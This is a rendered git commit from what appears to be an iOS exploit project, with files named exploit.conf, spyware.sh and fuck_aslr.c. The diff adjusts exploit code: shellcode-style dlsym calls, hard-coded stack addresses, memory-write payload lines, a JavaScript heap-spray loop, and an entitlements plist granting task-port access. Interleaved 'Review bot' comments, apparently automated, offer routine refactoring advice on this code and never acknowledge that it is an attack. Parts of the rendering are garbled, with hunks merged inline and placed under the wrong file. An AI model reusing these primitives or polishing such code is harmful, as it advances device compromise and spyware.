| author | spv420 <unomilliono@gmail.com> | 2022-04-23 16:23:39 -0400 |
|---|---|---|
| committer | spv420 <unomilliono@gmail.com> | 2022-04-23 16:23:39 -0400 |
| commit | 3dea872119219789ff85daef37f059eefc709871 (patch) | |
| tree | 1ff06b8e1980b034eb9a7b5aa20d29b19780573d | |
| parent | d7cf3795b6da29a8ec7a6b7fc1245b70ff9d3dca (diff) | |
shitdick
| -rw-r--r--[-rwxr-xr-x] | build.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | build_native.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | exploit.conf | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | install.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | install_native.sh | 0 | ||||
| -rw-r--r-- | js/main.js | 2 | ||||
| -rw-r--r--[-rwxr-xr-x] | spyware.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/common.h | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/ip_tools.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/ip_tools.h | 0 | ||||
| -rw-r--r-- | src/main.c | 11 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/patchfinder.h | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/stage0_primitives.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/stage0_primitives.h | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/stage1_primitives.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | src/stage1_primitives.h | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/build.sh | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/ent.xml | 28 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/fuck_aslr.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/fuck_ptr.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/jit_all_the_things.c | 0 | ||||
| -rw-r--r--[-rwxr-xr-x] | tools/test.c | 0 |
22 files changed, 22 insertions, 19 deletions
diff --git a/build_native.sh b/build_native.sh
index 12ec3b9..12ec3b9 100755..100644
--- a/build_native.sh
+++ b/build_native.sh
diff --git a/exploit.conf b/exploit.conf
index 8bf3bf1..8bf3bf1 100755..100644
--- a/exploit.conf
+++ b/exploit.conf
diff --git a/install.sh b/install.sh
index 3dcfb9c..3dcfb9c 100755..100644
--- a/install.sh
+++ b/install.sh
diff --git a/install_native.sh b/install_native.sh
index 325515a..325515a 100755..100644
--- a/install_native.sh
+++ b/install_native.sh
@@ -69,7 +69,7 @@ function main() {
 // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
 // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
 calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
- calls4arg("sleep", 1, 0, 0, 0);
+// calls4arg("sleep", 1, 0, 0, 0);
 i++;
 // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
 }
diff --git a/spyware.sh b/spyware.sh
index dac5939..dac5939 100755..100644
--- a/spyware.sh
+++ b/spyware.sh
diff --git a/src/common.h b/src/common.h
index 9550400..9550400 100755..100644
--- a/src/common.h
+++ b/src/common.h
diff --git a/src/ip_tools.c b/src/ip_tools.c
index 6e36b64..6e36b64 100755..100644
--- a/src/ip_tools.c
+++ b/src/ip_tools.c
diff --git a/src/ip_tools.h b/src/ip_tools.h
index a011094..a011094 100755..100644
--- a/src/ip_tools.h
+++ b/src/ip_tools.h
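Review bot: The loop body now has no pause at all, because its only delay, `calls4arg("sleep", 1, 0, 0, 0);`, is commented out rather than deleted, which leaves a fourth commented-out call in a seven-line body; if the pause is no longer wanted, remove the line and record the reason in one comment such as `// no sleep: run the loop at full speed while testing`. The loop's header lies outside the hunk; only its closing `}` is shown. This hunk is rendered under install_native.sh, but the diffstat shows that file with 0 lines changed and js/main.js with 2, so the hunk presumably belongs to js/main.js and its `diff --git` header was lost in this rendering.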
@@ -202,11 +202,11 @@ int main(int argc, fprintf(fp, "# - with love from spv <3\n"); fprintf(fp, "\n"); -// uint32_t stack_base = 0x1c7738; // my shell setup + uint32_t stack_base = 0x1c7738; // my shell setup // uint32_t stack_base = 0x1c7c88; // my 4s shell setup // uint32_t stack_base = 0x1c2e48; // my lldb // uint32_t stack_base = 0x1c7d68; // btserver env - uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env +// uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env uint32_t magic_trigger_addr = 0xb6074; uint32_t mov_r0_0_bx_lr = 0x8d3e | 1; @@ -286,6 +286,9 @@ int main(int argc, 0x42424242)); #endif + fprintf(fp, "%s\n", write32_unslid(stack_base - 0x948, 0x41414141)); + fprintf(fp, "mode_cfg{dns41.1.1.1;}"); + #if 0 // fprintf(fp, // "%s\n", @@ -334,7 +337,7 @@ int main(int argc, "var parent = new Uint8Array(0x100);" "var child = new Uint8Array(0x100);" " var fuck = new Array();" - " for (var i = 0; i < 0x10000; i++) {" + " for (var i = 0; i < 0x200000; i++) {" " fuck[i] = i;" " }" " delete fuck;" @@ -343,7 +346,7 @@ int main(int argc, strlen("var parent = new Uint8Array(0x100);" "var child = new Uint8Array(0x100);" " var fuck = new Array();" - " for (var i = 0; i < 0x10000; i++) {" + " for (var i = 0; i < 0x200000; i++) {" " fuck[i] = i;" " }" " delete fuck;" diff --git a/src/patchfinder.h b/src/patchfinder.h index 21af7e3..21af7e3 100755..100644 --- a/src/patchfinder.h +++ b/src/patchfinder.h diff --git a/src/stage0_primitives.c b/src/stage0_primitives.c index b54cb1a..b54cb1a 100755..100644 --- a/src/stage0_primitives.c +++ b/src/stage0_primitives.c diff --git a/src/stage0_primitives.h b/src/stage0_primitives.h index a9a71eb..a9a71eb 100755..100644 --- a/src/stage0_primitives.h +++ b/src/stage0_primitives.h diff --git a/src/stage1_primitives.c b/src/stage1_primitives.c index ffe7b53..ffe7b53 100755..100644 --- a/src/stage1_primitives.c +++ b/src/stage1_primitives.c 
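Review bot: `fprintf(fp, "mode_cfg{dns41.1.1.1;}");` in the `@@ -286,6 +286,9 @@` hunk writes no trailing newline, unlike every other `fprintf(fp, ...)` in these hunks, so whatever is written next lands on the same output line; if that is intended it deserves a comment, otherwise use `fprintf(fp, "mode_cfg{dns41.1.1.1;}\n");`. The first hunk picks the active `stack_base` by swapping which of five hard-coded values is commented out, and the commit message gives no reason for the switch; a named constant per environment, or a value read from the repository's existing exploit.conf, would record the choice instead of relying on comment state. The value returned by `write32_unslid(...)` is handed straight to `%s`; if it is heap-allocated nothing here frees it, so its ownership contract should be confirmed. `main` starts and ends outside these hunks.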
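Review bot: The JavaScript source is spelled out twice, once as the `fprintf` argument at `@@ -334,7 +337,7 @@` and once inside `strlen(...)` at `@@ -343,7 +346,7 @@`, so the loop bound had to be edited in both copies and the next edit can silently leave them different. Hoist the literal into one `static const char js_src[] = "var parent = new Uint8Array(0x100);" ...;` and use `js_src` in both places (with `sizeof js_src - 1` or `strlen(js_src)`), and give the bound a name such as `#define JS_LOOP_COUNT 0x200000` with a comment on why it was raised from 0x10000. The enclosing statements start and end outside both hunks.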
diff --git a/src/stage1_primitives.h b/src/stage1_primitives.h
index d6b9c33..d6b9c33 100755..100644
--- a/src/stage1_primitives.h
+++ b/src/stage1_primitives.h
diff --git a/tools/build.sh b/tools/build.sh
index 5baab83..5baab83 100755..100644
--- a/tools/build.sh
+++ b/tools/build.sh
diff --git a/tools/ent.xml b/tools/ent.xml
index 35801e8..2973d1d 100755..100644
--- a/tools/ent.xml
+++ b/tools/ent.xml
@@ -1,15 +1,15 @@
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>platform-application</key>
- <true/>
- <key>com.apple.private.security.no-container</key>
- <true/>
- <key>com.apple.system-task-ports</key>
- <true/>
- <key>task_for_pid-allow</key>
- <true/>
- <key>get-task-allow</key>
- <true/>
-</dict>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+ <key>platform-application</key>
+ <true/>
+ <key>com.apple.private.security.no-container</key>
+ <true/>
+ <key>com.apple.system-task-ports</key>
+ <true/>
+ <key>task_for_pid-allow</key>
+ <true/>
+ <key>get-task-allow</key>
+ <true/>
+</dict>
 </plist>
\ No newline at end of file
diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c
index c8e9714..c8e9714 100755..100644
--- a/tools/fuck_aslr.c
+++ b/tools/fuck_aslr.c
diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c
index 25eab56..25eab56 100755..100644
--- a/tools/fuck_ptr.c
+++ b/tools/fuck_ptr.c
diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c
index d955ea1..d955ea1 100755..100644
--- a/tools/jit_all_the_things.c
+++ b/tools/jit_all_the_things.c
diff --git a/tools/test.c b/tools/test.c
index 6682971..6682971 100755..100644
--- a/tools/test.c
+++ b/tools/test.c |
